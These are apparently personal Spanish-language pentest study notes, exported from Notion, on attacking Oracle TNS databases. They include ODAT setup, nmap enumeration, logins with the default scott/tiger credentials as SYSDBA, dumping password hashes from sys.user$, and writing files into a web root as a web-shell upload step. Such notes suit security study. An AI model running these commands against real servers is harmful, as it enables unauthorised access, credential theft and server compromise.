ORACLE TNS | Notion

Instalación de ODAT:

sudo apt-get install libaio1 python3-dev alien -y
git clone <https://github.com/quentinhardy/odat.git>
cd odat/
git submodule init
git submodule update
wget <https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip>
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget <https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip>
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

ODAT es una herramienta diseñada para enumerar y explotar vulnerabilidades en bases de datos Oracle.

Comandos relacionados:

Enumeración de puertos: sudo nmap -p1521 -sV <IP> --open
Uso de ODAT: ./odat.py all -s <IP>

Conexión a Oracle usando SQLplus:

Instalacion:

wget
<https://download.oracle.com/otn_software/linux/instantclient/2340000/instantclientbasic-linux.x64-23.4.0.24.05.zip>
wget
<https://download.oracle.com/otn_software/linux/instantclient/2340000/instantclientsqlplus-linux.x64-23.4.0.24.05.zip>
sudo unzip /home/botache/programas/instantclient-basic-linux.x64-23.4.0.24.05.zip -d
/opt/oracle/instantclient_23_4
sudo unzip /home/botache/programas/instantclient-sqlplus-linux.x64-23.4.0.24.05.zip -d
/opt/oracle/instantclient_23_4
sudo mkdir -p /opt/oracle
sudo mv instantclient_23_4 /opt/oracle/
echo 'export PATH=/opt/oracle/instantclient_23_4:$PATH' >> ~/.bashrc
echo 'export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_4' >> ~/.bashrc
echo 'export TNS_ADMIN=/opt/oracle/instantclient_23_4' >> ~/.bashrc
source ~/.bashrc
sqlplus -v

USO :
- sqlplus scott/tiger@<IP>/XE as sysdba:
  - SYSDBA OPCIONAL PARA ENTRAR COMO ADMIN
En caso de error relacionado con bibliotecas:

sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig

Comandos SQL importantes:

Ver tablas: select table_name from all_tables;
Ver permisos: SELECT * FROM user_role_privs;
Escalar privilegios: sqlplus scott/tiger@<IP>/XE AS SYSDBA
Extraer hashes de contraseñas: SELECT name, password FROM sys.user$;

Carga de una web shell en el servidor:

Ubicación por sistema:
- Linux: /var/www/html
- Windows: C:\\inetpub\\wwwroot
Subida de archivo:

echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s <IP> -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://<IP>/testing.txt

IPMI